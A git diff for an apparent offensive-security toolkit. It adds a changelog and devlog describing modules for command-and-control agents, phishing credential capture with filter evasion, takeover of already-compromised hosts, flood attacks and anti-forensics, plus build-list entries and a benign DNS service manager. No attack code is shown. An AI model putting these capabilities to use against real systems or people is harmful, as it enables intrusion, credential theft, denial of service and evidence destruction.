diff --git a/.gitignore b/.gitignore index c066dab..779b904 100644 --- a/.gitignore +++ b/.gitignore @@ -59,7 +59,9 @@ android/ dist/ build/ build_temp/ +release/ *.spec.bak +*.zip # Local utility scripts kill_autarch.bat @@ -71,6 +73,9 @@ Thumbs.db # Claude Code .claude/ +# Development planning docs +phase2.md + # Snoop data snoop/ data/sites/snoop_full.json diff --git a/CHANGELOG.md b/CHANGELOG.md new file mode 100644 index 0000000..c0b1764 --- /dev/null +++ b/CHANGELOG.md @@ -0,0 +1,187 @@ +# AUTARCH Changelog + +--- + +## v2.2.0 — 2026-03-03 + +### Full Arsenal Expansion — 16 New Modules + +Phase 2 complete. 16 new security modules with full CLI, Flask routes, and web UI templates. + +#### Offense +- **WiFi Auditing** (`/wifi/`) — aircrack-ng integration: monitor mode, AP scanning, deauth attacks, WPA handshake capture/crack, WPS Pixie-Dust, rogue AP detection, packet capture +- **API Fuzzer** (`/api-fuzzer/`) — OpenAPI/Swagger discovery, parameter fuzzing (SQLi/XSS/traversal/type confusion), auth bypass & IDOR testing, rate limit probing, GraphQL introspection attacks +- **Cloud Security Scanner** (`/cloud/`) — S3/GCS/Azure blob enumeration, exposed service scanning, IMDS metadata SSRF checks, cloud subdomain enumeration +- **C2 Framework** (`/c2/`) — multi-session agent management, Python/PowerShell/Bash payloads, HTTP/HTTPS/DNS beaconing, file transfer, SOCKS pivoting, listener management +- **Web Application Scanner** (`/webscan/`) — directory bruteforce, subdomain enum, SQLi/XSS detection, header analysis, tech fingerprinting, SSL/TLS audit, crawler + +#### Defense +- **Threat Intel Feed** (`/threat-intel/`) — IOC management (IP/domain/hash/URL), STIX/CSV/JSON feed ingestion, VirusTotal & AbuseIPDB API lookups, network correlation, blocklist export (iptables/nginx/snort) +- **Log Correlator** (`/logs/`) — multi-format log parsing (syslog/Apache/JSON), 10 built-in detection rules (SSH brute force, SQLi, XSS, path traversal), threshold alerting, custom rules, timeline view + +#### Counter +- **Steganography** (`/stego/`) — LSB image encoding (PNG/BMP), audio steganography (WAV), document whitespace encoding (zero-width chars), AES-256 pre-encryption, chi-square & RS statistical detection +- **Anti-Forensics** (`/anti-forensics/`) — multi-pass secure file/directory deletion, free space wiping, timestamp manipulation (set/clone/randomize), log clearing, shell history scrubbing, EXIF & PDF metadata stripping + +#### Analyze +- **Password Toolkit** (`/passwords/`) — hash identification & cracking (hashcat/john integration), secure password generation, credential spray testing (SSH/FTP/SMB/HTTP), wordlist management, policy auditing +- **Network Topology Mapper** (`/netmap/`) — ARP/ICMP/TCP host discovery, service enumeration, OS fingerprinting, SVG topology visualization, subnet grouping, scan diffing +- **Reporting Engine** (`/reports/`) — structured pentest reports, CVSS-scored findings, auto-population from scans & dossiers, PDF/HTML/Markdown export, compliance mapping (OWASP/NIST/CIS) +- **BLE Scanner** (`/ble/`) — BLE advertisement scanning via bleak, service & characteristic enumeration, read/write operations, known vulnerability database, RSSI proximity tracking +- **Forensics Toolkit** (`/forensics/`) — disk imaging (dd + hash verification), file carving by magic bytes (15 types), EXIF metadata extraction, filesystem timeline builder, chain of custody logging +- **RFID/NFC Tools** (`/rfid/`) — Proxmark3 integration (LF/HF search, EM410x read/clone/sim, MIFARE dump/clone), libnfc NFC scanning, card database, default MIFARE keys +- **Malware Sandbox** (`/sandbox/`) — sample submission (file upload or path), static analysis (strings, PE/ELF parsing, YARA-like indicators, risk scoring), Docker-based dynamic analysis with behavior logging + +### Build System +- All 16 modules wired into `web/app.py` (blueprint registration), `base.html` (sidebar navigation), `autarch_public.spec` and `setup_msi.py` (hidden imports) +- Sidebar organized by category: Defense, Offense, Counter, Analyze + +--- + +## v2.1.0 — 2026-03-03 + +### DNS-over-TLS (DoT) & DNS-over-HTTPS (DoH) + +- **Full DoT implementation** — encrypted DNS queries over TLS (port 853) with certificate validation +- **Full DoH implementation** — encrypted DNS queries over HTTPS (RFC 8484, wire-format POST) +- **Auto-detection** for known encrypted providers: + - Google DNS (`8.8.8.8`, `8.8.4.4`) — DoT via `dns.google`, DoH via `https://dns.google/dns-query` + - Cloudflare (`1.1.1.1`, `1.0.0.1`) — DoT via `one.one.one.one`, DoH via `https://cloudflare-dns.com/dns-query` + - Quad9 (`9.9.9.9`, `149.112.112.112`) — DoT via `dns.quad9.net`, DoH via `https://dns.quad9.net/dns-query` + - OpenDNS (`208.67.222.222`, `208.67.220.220`) — DoT/DoH via `dns.opendns.com` + - AdGuard (`94.140.14.14`, `94.140.15.15`) — DoT/DoH via `dns.adguard-dns.com` +- **Priority chain**: DoH > DoT > Plain DNS — auto-fallback on failure +- **Encryption test tool** in the Nameserver UI — live test DoT/DoH/Plain against any server with latency reporting +- **Toggle controls** — enable/disable DoT and DoH independently via UI or API +- **API endpoints**: `GET/POST /api/encryption`, `POST /api/encryption/test` + +### Hosts File Support + +- **Hosts-file parser** — `/etc/hosts` style hostname resolution served via DNS +- **Resolution priority**: Hosts file entries checked before zones and cache for fastest local resolution +- **CRUD operations** — add, remove, search individual host entries via UI or API +- **Bulk import** — paste hosts-file format text or load from a file path (e.g., `/etc/hosts`, `C:\Windows\System32\drivers\etc\hosts`) +- **System hosts loader** — one-click button to load the OS hosts file +- **Export** — download current hosts database in standard hosts-file format +- **PTR reverse lookup** — hosts entries support reverse DNS (in-addr.arpa) queries +- **Alias support** — multiple hostnames per IP, matching on primary hostname or any alias +- **Hosts tab** in Nameserver UI — full management table with search, inline add, import/export +- **API endpoints**: `GET/POST/DELETE /api/hosts`, `POST /api/hosts/import`, `GET /api/hosts/export` + +### EZ Intranet Domain (One-Click Local DNS) + +- **One-click intranet domain creation** in the Nameserver UI +- **Auto network detection** — discovers local IP, hostname, gateway, subnet via socket/ARP +- **Host discovery** — scans ARP table for all devices on the network with reverse DNS lookup +- **Editable DNS names** — auto-suggests names for discovered hosts, fully editable before deployment +- **Custom hosts** — add arbitrary hosts not found by network scan +- **Deployment creates**: + - Forward DNS zone with SOA + NS records + - A records for server, hostname, and all selected/custom hosts + - Hosts-file entries for instant resolution + - Reverse DNS zone (PTR records) for reverse lookups +- **Client configuration** — shows copy-paste instructions for Windows (`netsh`) and Linux (`resolv.conf`/`systemd-resolved`) +- **Router DHCP hint** — advises setting the DNS server IP in router DHCP for automatic network-wide deployment +- **API endpoint**: `POST /dns/ez-intranet` + +### Full Configuration UI + +Expanded the Config tab from 5 fields to 18 fields across 5 categories: + +- **Network** — DNS listen address, API listen address, upstream forwarder servers +- **Cache & Performance** — cache TTL, negative cache TTL (NXDOMAIN), SERVFAIL cache TTL, query log max entries, max UDP response size, rate limit (queries/sec/IP), prefetch toggle +- **Security** — query logging, refuse ANY queries (anti-amplification), minimal responses (hide server info), zone transfer ACL (AXFR/IXFR whitelist) +- **Encryption** — DoH enable/disable, DoT enable/disable with priority explanation +- **Hosts** — hosts file path, auto-load on startup toggle + +All settings are live-editable from the dashboard and propagated to the running server without restart. + +### Go DNS Server Changes + +- **`server/resolver.go`** — added `QueryUpstreamDoT()`, `QueryUpstreamDoH()`, `queryUpstreamEncrypted()`, `GetEncryptionStatus()` with TLS 1.2+ minimum, HTTP/2 for DoH, proper SNI for DoT +- **`server/hosts.go`** — new file: `HostsStore` with `LoadFile()`, `LoadFromText()`, `Add()`, `Remove()`, `Lookup()`, `Export()`, PTR support +- **`server/dns.go`** — integrated hosts lookup before zone lookup in query handler; added `GetHosts()`, `GetEncryptionStatus()`, `SetEncryption()`, `GetResolver()` +- **`config/config.go`** — added `HostsFile`, `HostsAutoLoad`, `QueryLogMax`, `NegativeCacheTTL`, `PrefetchEnabled`, `ServFailCacheTTL` +- **`api/router.go`** — added 5 new endpoint groups: hosts CRUD, hosts import/export, encryption status/toggle, encryption test, full config expansion +- **`main.go`** — version bump to 2.1.0 + +### Web Dashboard Changes + +- **`web/templates/dns_nameserver.html`** — added 3 new tabs: Encryption, Hosts, EZ Intranet (13 tabs total) +- **`web/templates/dns_service.html`** — expanded Config tab with all 18 settings in categorized layout +- **`web/routes/dns_service.py`** — added 8 new routes: hosts CRUD, hosts import/export, encryption status/toggle/test, EZ intranet deploy + +--- + +## v2.0.0 — 2026-03-03 + +### Go DNS/Nameserver Service + +- **Full recursive DNS resolver** from IANA root hints — no upstream dependency +- **13 root server** iterative resolution with delegation chain following +- **CNAME chain following** across zone boundaries +- **Authoritative zone hosting** with JSON-backed zone storage +- **Record types**: A, AAAA, CNAME, MX, TXT, NS, SRV, PTR, SOA +- **DNSSEC toggle** per zone +- **DNS caching** with configurable TTL and automatic cleanup +- **Query logging** with ring buffer (configurable size) +- **Analytics**: top domains, query type distribution, per-client query counts +- **Blocklist**: exact match + wildcard parent domain matching, bulk import (hosts-file format) +- **Conditional forwarding**: zone-specific upstream server rules +- **Root health check**: concurrent ping of all 13 IANA root servers with latency measurement +- **Benchmark tool**: multi-domain latency testing with min/avg/max statistics +- **Zone import/export**: BIND zone file format support +- **Zone cloning**: duplicate zone with all records +- **Bulk record operations**: add multiple records in a single request +- **Mail record auto-setup**: one-click MX + SPF + DKIM + DMARC creation +- **Security hardening**: refuse ANY (anti-amplification), minimal responses, AXFR/IXFR blocking, rate limiting, max UDP size (1232 bytes for safe MTU) +- **REST API**: 30+ endpoints with token auth and CORS + +### Nameserver Web UI (10 tabs) + +- **Query** — DNS query tester against local NS or system resolver +- **Query Log** — auto-refreshing query history with filtering +- **Analytics** — top domains (bar charts), query type distribution, client stats, NS cache viewer +- **Cache** — searchable cache viewer with per-entry and full flush +- **Blocklist** — add/remove/search domains, bulk import in hosts-file format +- **Forwarding** — conditional forwarding rule management +- **Root Health** — concurrent check of all 13 root servers with latency bars +- **Benchmark** — multi-domain latency testing with visual results +- **Delegation** — NS delegation record generator with glue record instructions +- **Build** — Go binary compilation controls and instructions + +### DNS Zone Manager Web UI (7 tabs) + +- **Zones** — create/delete/clone zones +- **Records** — full CRUD with bulk add (JSON), filtering by type/search, column sorting +- **EZ-Local** — network auto-scan intranet domain setup with ARP host discovery +- **Reverse Proxy** — DDNS, nginx/Caddy/Apache config generation, UPnP port forwarding +- **Import/Export** — BIND zone file backup/restore with inline editor +- **Templates** — quick-setup for web server, mail server, PTR, subdomain delegation +- **Config** — full server configuration panel + +### Gone Fishing Mail Server Enhancements + +- **Landing pages** — 4 built-in phishing templates (Office 365, Google, Generic, VPN) + custom HTML editor +- **Credential capture** — form POST interception on unauthenticated endpoints with IP/UA/referer logging +- **DKIM signing** — OpenSSL RSA 2048-bit keypair generation and DNS record instructions +- **DNS auto-setup** — automatic MX/SPF/DKIM/DMARC record creation via DNS service integration +- **Email evasion** — Unicode homoglyphs (30% swap), zero-width character insertion (15%), HTML entity encoding (20%) +- **Header manipulation** — random X-Mailer, X-Priority, custom headers, spoofed Received chain generation +- **CSV import/export** — bulk target import and credential capture export +- **Campaign management** — per-campaign tracking, export, and capture association + +### IP Capture & Redirect Service + +- **Stealthy link tracking** — fast 302 redirect with IP/UA/headers capture +- **Realistic URL disguise** — article-style paths that look like real news URLs +- **GeoIP lookup** on captured IPs +- **Dossier integration** — add captures to existing OSINT dossiers +- **Management UI** — create/manage links, view captures with filtering, export + +### SYN Flood Module + +- **TCP SYN flood** attack tool with configurable parameters +- **Multi-threaded** packet generation +- **Port targeting** — single port, range, or random +- **Source IP spoofing** options diff --git a/DEVLOG.md b/DEVLOG.md index 9731f5e..24a404b 100644 --- a/DEVLOG.md +++ b/DEVLOG.md @@ -5610,3 +5610,133 @@ Wired Hal chat to the Agent system so it can create new AUTARCH modules on deman --- +## Phase 5 — Arsenal Expansion (2026-03-03) + +Major expansion adding 11 new modules across all categories: DNS service, IP capture, phishing mail, load testing, hack hijack, password toolkit, web app scanner, reporting engine, network topology mapper, and C2 framework. + +### Phase 5.0 — Go DNS/Nameserver Service + +**Problem:** No built-in DNS/nameserver capability. Phishing, C2, and OSINT operations all benefit from authoritative DNS control but required external tools. + +**Fix:** Built a standalone Go DNS server (`services/dns-server/`) with full zone management, record CRUD, DNSSEC signing, and upstream recursive resolution. Python management layer wraps the Go binary via HTTP REST API. Web dashboard provides zone editor, record management, DNSSEC toggle, and live metrics. + +**Files Changed:** +- `services/dns-server/` (NEW) — Go DNS server: `main.go`, `server/dns.go`, `server/zones.go`, `server/dnssec.go`, `server/resolver.go`, `api/router.go`, `api/zones.go`, `api/status.go`, `api/middleware.go`, `config/config.go`, `build.sh` +- `core/dns_service.py` (NEW) — `DNSServiceManager` singleton: binary discovery, process lifecycle, REST API proxy, zone/record CRUD, mail record setup, DNSSEC management, metrics +- `web/routes/dns_service.py` (NEW) — Blueprint `dns_service_bp`, 15+ endpoints proxying to Go API +- `web/templates/dns_service.html` (NEW) — Zone manager, record editor, DNSSEC panel, metrics dashboard +- `autarch_settings.conf` — Added `[dns]` section (enabled, listen, api_port, upstream, auto_start) + +### Phase 5.1 — IP Capture Redirect Service + +**Problem:** No way to track who clicks a link and capture their IP/metadata for OSINT operations. + +**Fix:** Created stealthy IP capture service with fast 302 redirects, realistic disguised URLs (looks like real article paths), full header capture (IP, User-Agent, Accept-Language, Referer, timezone), GeoIP lookup, and dossier integration. Capture endpoints are unauthenticated for stealth; management UI is behind login. + +**Files Changed:** +- `modules/ipcapture.py` (NEW, ~350 lines) — `IPCaptureService` class: link creation with disguise types, capture recording with full header extraction, GeoIP lookup, dossier integration, CSV/JSON export. CLI `run()` with 5 menu options. +- `web/routes/ipcapture.py` (NEW, ~120 lines) — Blueprint `ipcapture_bp`: link CRUD, capture viewer, export, unauthenticated capture endpoints (`/c/`, `/article/`) +- `web/templates/ipcapture.html` (NEW, ~300 lines) — 2 tabs: Create & Manage (link form, active links table, copy-to-clipboard, QR codes), Captures (per-link log with IP/geo/timestamp/UA, map, export, "Add to Dossier") + +### Phase 5.2 — Gone Fishing Mail Service + +**Problem:** No built-in phishing email capability for authorized penetration testing engagements. + +**Fix:** Full SMTP phishing mail service with HTML template editor, attachment support, sender spoofing, DKIM signing, self-signed TLS cert generation, campaign tracking, and DNS service integration for auto-creating MX/SPF/DKIM/DMARC records. + +**Files Changed:** +- `modules/phishmail.py` (NEW) — `PhishMailService` class: SMTP sending with spoofed headers, HTML templates, DKIM signing, TLS cert generation, campaign management, DNS auto-setup +- `web/routes/phishmail.py` (NEW) — Blueprint `phishmail_bp`: compose, send, templates, campaigns, DNS integration +- `web/templates/phishmail.html` (NEW) — 4 tabs: Compose (WYSIWYG-like), Templates, Campaigns, Server & Certs (DNS integration section) + +### Phase 5.3 — SYN Flood / Load Testing + +**Problem:** No built-in network stress testing / DDoS simulation for authorized testing. + +**Fix:** Created load testing module with SYN flood (raw sockets), HTTP flood (GET/POST), UDP flood, and Slowloris attack modes. Configurable threads, duration, packet size. Real-time stats via SSE. + +**Files Changed:** +- `modules/loadtest.py` (NEW) — `LoadTestService` class: SYN/HTTP/UDP/Slowloris flood modes, threaded execution, real-time statistics, bandwidth calculation +- `web/routes/loadtest.py` (NEW) — Blueprint `loadtest_bp`: start/stop/status endpoints, SSE stats stream +- `web/templates/loadtest.html` (NEW) — Attack mode selector, target config, live stats dashboard with packets/sec and bandwidth graphs + +### Phase 5.4 — Hack Hijack + +**Problem:** No way to scan for and take over already-compromised systems — devices with existing backdoors, RAT listeners, web shells, bind shells, or crypto miners. + +**Fix:** Created offense module with 25+ backdoor signatures covering EternalBlue/DoublePulsar, major RATs (Meterpreter, Cobalt Strike, njRAT, DarkComet, Quasar, AsyncRAT, Gh0st, Poison Ivy), shell backdoors, web shells (20+ common paths probed), SOCKS/HTTP proxies, and crypto miners. DoublePulsar detection uses SMB Trans2 SESSION_SETUP probe with MID manipulation analysis. Threaded scanning with configurable concurrency. + +**Files Changed:** +- `modules/hack_hijack.py` (NEW, ~580 lines) — `HackHijackService` class: `scan_target()` (threaded port scan + signature matching), `_check_doublepulsar()` (SMB Trans2 probe), `_check_smb()` (nmap MS17-010), `connect_raw_shell()`, `shell_execute()`, `attempt_takeover()`, `_detect_webshell()`. 25+ `BackdoorSignature` dataclasses. Singleton `get_hack_hijack()`. CLI `run()` with 5 options. +- `web/routes/hack_hijack.py` (NEW, ~100 lines) — Blueprint `hack_hijack_bp`: scan (POST + poll), takeover, sessions CRUD, shell exec, history +- `web/templates/hack_hijack.html` (NEW, ~250 lines) — 4 tabs: Scan Target, Results (color-coded confidence + category badges), Sessions (interactive shell terminal), History + +### Phase 5.5 — Password Toolkit + +**Problem:** No built-in hash analysis or password cracking capability. + +**Fix:** Created analyze module with 22 hash type signatures (MD5 through bcrypt/scrypt/Argon2), hashcat/John integration via subprocess with Python fallback for common hashes, configurable password generator with pattern syntax (`?u`/`?l`/`?d`/`?s`/`?a`), entropy-based password auditing, and credential spray testing against SSH/FTP/SMB services. + +**Files Changed:** +- `modules/password_toolkit.py` (NEW, ~480 lines) — `PasswordToolkit` class: `identify_hash()` (22 regex signatures with hashcat mode + john format), `crack_hash()` (hashcat → john → python fallback), `generate_password()` (charset + pattern), `audit_password()` (entropy + policy), `credential_spray()` (SSH/FTP/SMB), `list_wordlists()`, `hash_string()`. Singleton `get_password_toolkit()`. +- `web/routes/password_toolkit.py` (NEW, ~120 lines) — Blueprint `password_toolkit_bp`, 12 endpoints +- `web/templates/password_toolkit.html` (NEW, ~250 lines) — 5 tabs: Identify, Crack, Generate, Spray, Wordlists. Live password audit with animated strength bar. + +### Phase 5.6 — Web Application Scanner + +**Problem:** No built-in web vulnerability scanner for authorized penetration testing. + +**Fix:** Created offense module with directory bruteforce (threaded, ~60 built-in paths + custom wordlists), subdomain enumeration (crt.sh CT logs + DNS brute), technology fingerprinting (17 signatures: WordPress, Drupal, Laravel, Django, React, Angular, etc.), security header analysis (10 checks), SSL/TLS audit, SQLi detection (error-based signatures), XSS detection (reflected payloads), and site crawling with depth control. + +**Files Changed:** +- `modules/webapp_scanner.py` (NEW, ~500 lines) — `WebAppScanner` class: `quick_scan()` (headers + tech + SSL), `dir_bruteforce()` (threaded), `subdomain_enum()` (CT logs + DNS brute), `vuln_scan()` (SQLi + XSS), `crawl()` (spider with depth), `_check_ssl()`, `_fingerprint_tech()`. 17 `TECH_SIGNATURES`, 10 `SECURITY_HEADERS`, `SQLI_PAYLOADS`, `XSS_PAYLOADS`, `SQL_ERRORS`. +- `web/routes/webapp_scanner.py` (NEW, ~60 lines) — Blueprint `webapp_scanner_bp`, 6 endpoints +- `web/templates/webapp_scanner.html` (NEW, ~200 lines) — 5 tabs: Quick Scan, Dir Brute, Subdomains, Vuln Scan, Crawl + +### Phase 5.7 — Reporting Engine + +**Problem:** No structured way to compile pentest findings into professional reports. + +**Fix:** Created analyze module with structured report builder (executive summary, scope, methodology, findings, recommendations), 10 pre-built finding templates with CVSS scores mapped to OWASP Top 10 (SQLi 9.8, XSS 7.5, Broken Auth 9.1, IDOR 7.5, Missing Headers 3.1, etc.), and export to HTML (styled with severity summary), Markdown, and JSON formats. JSON file persistence per report in `data/reports/`. + +**Files Changed:** +- `modules/report_engine.py` (NEW, ~380 lines) — `ReportEngine` class: `create_report()`, `add_finding()`, `update_finding()`, `export_html()` (styled HTML with severity breakdown), `export_markdown()`, `export_json()`. 10 `FINDING_TEMPLATES` with CVSS scores. Singleton `get_report_engine()`. +- `web/routes/report_engine.py` (NEW, ~90 lines) — Blueprint `report_engine_bp`, 11 endpoints +- `web/templates/report_engine.html` (NEW, ~220 lines) — 3 tabs: Reports (list + create), Editor (severity summary + findings + export), Templates (pre-built finding types) + +### Phase 5.8 — Network Topology Mapper + +**Problem:** No visual network mapping capability beyond raw nmap output. + +**Fix:** Created analyze module with host discovery (nmap or ICMP/TCP ping sweep, 100 concurrent threads), service enumeration with OS fingerprinting, SVG topology visualization with force-directed layout, auto-grouping by subnet, scan persistence with diff comparison (new/removed/unchanged hosts over time), and CIDR expansion via `struct.unpack`/`socket.inet_aton`. + +**Files Changed:** +- `modules/net_mapper.py` (NEW, ~400 lines) — `NetMapper` class: `discover_hosts()` (nmap/ping sweep), `scan_host()` (nmap or socket fallback), `build_topology()` (nodes + edges graph), `save_scan()`, `load_scan()`, `diff_scans()`. `Host` dataclass. Singleton `get_net_mapper()`. +- `web/routes/net_mapper.py` (NEW, ~70 lines) — Blueprint `net_mapper_bp`, 8 endpoints (discover + poll, scan-host, topology, scans CRUD, diff) +- `web/templates/net_mapper.html` (NEW, ~200 lines) — 3 tabs: Discover (host table with detail scan), Map (SVG topology with color-coded node types), Saved Scans (list + diff comparison) + +### Phase 5.9 — C2 Framework + +**Problem:** Reverse shell listener existed but no multi-agent command & control infrastructure. + +**Fix:** Created offense module with multi-listener TCP server, multi-agent management, task queue architecture, and agent templates for Python/Bash/PowerShell with configurable beacon interval and jitter. Agents support: register, exec, download, upload, sysinfo commands. Communication via HTTP beaconing or raw TCP. Web UI provides agent dashboard with auto-refresh, interactive shell, and payload generator with one-liners. + +**Files Changed:** +- `modules/c2_framework.py` (NEW, ~500 lines) — `C2Server` class: `start_listener()` (TCP accept loop), `_handle_agent()` (registration + task dispatch), `queue_task()`, `execute_command()`, `download_file()`, `upload_file()`, `generate_agent()`, `get_oneliner()`. `PYTHON_AGENT_TEMPLATE`, `BASH_AGENT_TEMPLATE`, `POWERSHELL_AGENT_TEMPLATE`. Singleton `get_c2_server()`. +- `web/routes/c2_framework.py` (NEW, ~100 lines) — Blueprint `c2_framework_bp`, 12 endpoints (listeners, agents, tasks, generate, oneliner) +- `web/templates/c2_framework.html` (NEW, ~220 lines) — 3 tabs: Dashboard (listeners + agents + task queue with 10s auto-refresh), Agents (interactive shell terminal), Generate (agent payloads + one-liners with copy-to-clipboard) + +### Phase 5.10 — Wiring & Build Config + +**Problem:** All new modules needed to be wired into the Flask app, sidebar navigation, and build configs. + +**Fix:** Registered all 11 new blueprints in `web/app.py`, added sidebar links under appropriate categories in `base.html`, and added all modules to hidden imports in both `autarch_public.spec` (PyInstaller) and `setup_msi.py` (cx_Freeze). + +**Files Changed:** +- `web/app.py` — Added imports + `register_blueprint()` for: `llm_trainer_bp`, `autonomy_bp`, `loadtest_bp`, `phishmail_bp`, `dns_service_bp`, `ipcapture_bp`, `hack_hijack_bp`, `password_toolkit_bp`, `webapp_scanner_bp`, `report_engine_bp`, `net_mapper_bp`, `c2_framework_bp` +- `web/templates/base.html` — Sidebar additions: Defense: `└ Defender Monitor`; Offense: `└ Load Test`, `└ Gone Fishing`, `└ Hack Hijack`, `└ Web Scanner`, `└ C2 Framework`; Analyze: `└ Hash Toolkit`, `└ LLM Trainer`, `└ Password Toolkit`, `└ Net Mapper`, `└ Reports`; OSINT: `└ IP Capture`; System: `└ DNS Server` +- `autarch_public.spec` — Added 12 new entries to `hiddenimports` +- `setup_msi.py` — Added 12 new entries to `includes` + +--- + diff --git a/autarch_public.spec b/autarch_public.spec index 2f21c02..0dbbc88 100644 --- a/autarch_public.spec +++ b/autarch_public.spec @@ -89,6 +89,48 @@ hidden_imports = [ 'web.routes.encmodules', 'web.routes.llm_trainer', 'web.routes.autonomy', + 'web.routes.loadtest', + 'web.routes.phishmail', + 'web.routes.dns_service', + 'web.routes.ipcapture', + 'web.routes.hack_hijack', + 'web.routes.password_toolkit', + 'web.routes.webapp_scanner', + 'web.routes.report_engine', + 'web.routes.net_mapper', + 'web.routes.c2_framework', + 'web.routes.wifi_audit', + 'web.routes.threat_intel', + 'web.routes.steganography', + 'web.routes.api_fuzzer', + 'web.routes.ble_scanner', + 'web.routes.forensics', + 'web.routes.rfid_tools', + 'web.routes.cloud_scan', + 'web.routes.malware_sandbox', + 'web.routes.log_correlator', + 'web.routes.anti_forensics', + 'modules.loadtest', + 'modules.phishmail', + 'modules.ipcapture', + 'modules.hack_hijack', + 'modules.password_toolkit', + 'modules.webapp_scanner', + 'modules.report_engine', + 'modules.net_mapper', + 'modules.c2_framework', + 'modules.wifi_audit', + 'modules.threat_intel', + 'modules.steganography', + 'modules.api_fuzzer', + 'modules.ble_scanner', + 'modules.forensics', + 'modules.rfid_tools', + 'modules.cloud_scan', + 'modules.malware_sandbox', + 'modules.log_correlator', + 'modules.anti_forensics', + 'core.dns_service', # Standard library (sometimes missed on Windows) 'email.mime.text', 'email.mime.multipart', diff --git a/core/dns_service.py b/core/dns_service.py new file mode 100644 index 0000000..41a0081 --- /dev/null +++ b/core/dns_service.py @@ -0,0 +1,324 @@ +"""AUTARCH DNS Service Manager — controls the Go-based autarch-dns binary.""" + +import os +import sys +import json +import time +import signal +import socket +import subprocess +import threading +from pathlib import Path + +try: + from core.paths import find_tool, get_data_dir +except ImportError: + def find_tool(name): + import shutil + return shutil.which(name) + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + +try: + import requests + _HAS_REQUESTS = True +except ImportError: + _HAS_REQUESTS = False + + +class DNSServiceManager: + """Manage the autarch-dns Go binary (start/stop/API calls).""" + + def __init__(self): + self._process = None + self._pid = None + self._config = None + self._config_path = os.path.join(get_data_dir(), 'dns', 'config.json') + self._load_config() + + def _load_config(self): + if os.path.exists(self._config_path): + try: + with open(self._config_path, 'r') as f: + self._config = json.load(f) + except Exception: + self._config = None + if not self._config: + self._config = { + 'listen_dns': '0.0.0.0:53', + 'listen_api': '127.0.0.1:5380', + 'api_token': os.urandom(16).hex(), + 'upstream': [], # Empty = pure recursive from root hints + 'cache_ttl': 300, + 'zones_dir': os.path.join(get_data_dir(), 'dns', 'zones'), + 'dnssec_keys_dir': os.path.join(get_data_dir(), 'dns', 'keys'), + 'log_queries': True, + } + self._save_config() + + def _save_config(self): + os.makedirs(os.path.dirname(self._config_path), exist_ok=True) + with open(self._config_path, 'w') as f: + json.dump(self._config, f, indent=2) + + @property + def api_base(self) -> str: + addr = self._config.get('listen_api', '127.0.0.1:5380') + return f'http://{addr}' + + @property + def api_token(self) -> str: + return self._config.get('api_token', '') + + def find_binary(self) -> str: + """Find the autarch-dns binary.""" + binary = find_tool('autarch-dns') + if binary: + return binary + # Check common locations + base = Path(__file__).parent.parent + candidates = [ + base / 'services' / 'dns-server' / 'autarch-dns', + base / 'services' / 'dns-server' / 'autarch-dns.exe', + base / 'tools' / 'windows-x86_64' / 'autarch-dns.exe', + base / 'tools' / 'linux-arm64' / 'autarch-dns', + base / 'tools' / 'linux-x86_64' / 'autarch-dns', + ] + for c in candidates: + if c.exists(): + return str(c) + return None + + def is_running(self) -> bool: + """Check if the DNS service is running.""" + # Check process + if self._process and self._process.poll() is None: + return True + # Check by API + try: + resp = self._api_get('/api/status') + return resp.get('ok', False) + except Exception: + return False + + def start(self) -> dict: + """Start the DNS service.""" + if self.is_running(): + return {'ok': True, 'message': 'DNS service already running'} + + binary = self.find_binary() + if not binary: + return {'ok': False, 'error': 'autarch-dns binary not found. Build it with: cd services/dns-server && go build'} + + # Ensure zone dirs exist + os.makedirs(self._config.get('zones_dir', ''), exist_ok=True) + os.makedirs(self._config.get('dnssec_keys_dir', ''), exist_ok=True) + + # Save config for the Go binary to read + self._save_config() + + cmd = [ + binary, + '-config', self._config_path, + ] + + try: + kwargs = { + 'stdout': subprocess.DEVNULL, + 'stderr': subprocess.DEVNULL, + } + if sys.platform == 'win32': + kwargs['creationflags'] = ( + subprocess.CREATE_NEW_PROCESS_GROUP | + subprocess.CREATE_NO_WINDOW + ) + else: + kwargs['start_new_session'] = True + + self._process = subprocess.Popen(cmd, **kwargs) + self._pid = self._process.pid + + # Wait for API to be ready + for _ in range(30): + time.sleep(0.5) + try: + resp = self._api_get('/api/status') + if resp.get('ok'): + return { + 'ok': True, + 'message': f'DNS service started (PID {self._pid})', + 'pid': self._pid, + } + except Exception: + if self._process.poll() is not None: + return {'ok': False, 'error': 'DNS service exited immediately — may need admin/root for port 53'} + continue + + return {'ok': False, 'error': 'DNS service started but API not responding'} + except PermissionError: + return {'ok': False, 'error': 'Permission denied — DNS on port 53 requires admin/root'} + except Exception as e: + return {'ok': False, 'error': str(e)} + + def stop(self) -> dict: + """Stop the DNS service.""" + if self._process and self._process.poll() is None: + try: + if sys.platform == 'win32': + self._process.terminate() + else: + os.kill(self._process.pid, signal.SIGTERM) + self._process.wait(timeout=5) + except Exception: + self._process.kill() + self._process = None + self._pid = None + return {'ok': True, 'message': 'DNS service stopped'} + return {'ok': True, 'message': 'DNS service was not running'} + + def status(self) -> dict: + """Get service status.""" + running = self.is_running() + result = { + 'running': running, + 'pid': self._pid, + 'listen_dns': self._config.get('listen_dns', ''), + 'listen_api': self._config.get('listen_api', ''), + } + if running: + try: + resp = self._api_get('/api/status') + result.update(resp) + except Exception: + pass + return result + + # ── API wrappers ───────────────────────────────────────────────────── + + def _api_get(self, endpoint: str) -> dict: + if not _HAS_REQUESTS: + return self._api_urllib(endpoint, 'GET') + resp = requests.get( + f'{self.api_base}{endpoint}', + headers={'Authorization': f'Bearer {self.api_token}'}, + timeout=5, + ) + return resp.json() + + def _api_post(self, endpoint: str, data: dict = None) -> dict: + if not _HAS_REQUESTS: + return self._api_urllib(endpoint, 'POST', data) + resp = requests.post( + f'{self.api_base}{endpoint}', + headers={'Authorization': f'Bearer {self.api_token}', 'Content-Type': 'application/json'}, + json=data or {}, + timeout=5, + ) + return resp.json() + + def _api_delete(self, endpoint: str) -> dict: + if not _HAS_REQUESTS: + return self._api_urllib(endpoint, 'DELETE') + resp = requests.delete( + f'{self.api_base}{endpoint}', + headers={'Authorization': f'Bearer {self.api_token}'}, + timeout=5, + ) + return resp.json() + + def _api_put(self, endpoint: str, data: dict = None) -> dict: + if not _HAS_REQUESTS: + return self._api_urllib(endpoint, 'PUT', data) + resp = requests.put( + f'{self.api_base}{endpoint}', + headers={'Authorization': f'Bearer {self.api_token}', 'Content-Type': 'application/json'}, + json=data or {}, + timeout=5, + ) + return resp.json() + + def _api_urllib(self, endpoint: str, method: str, data: dict = None) -> dict: + """Fallback using urllib (no requests dependency).""" + import 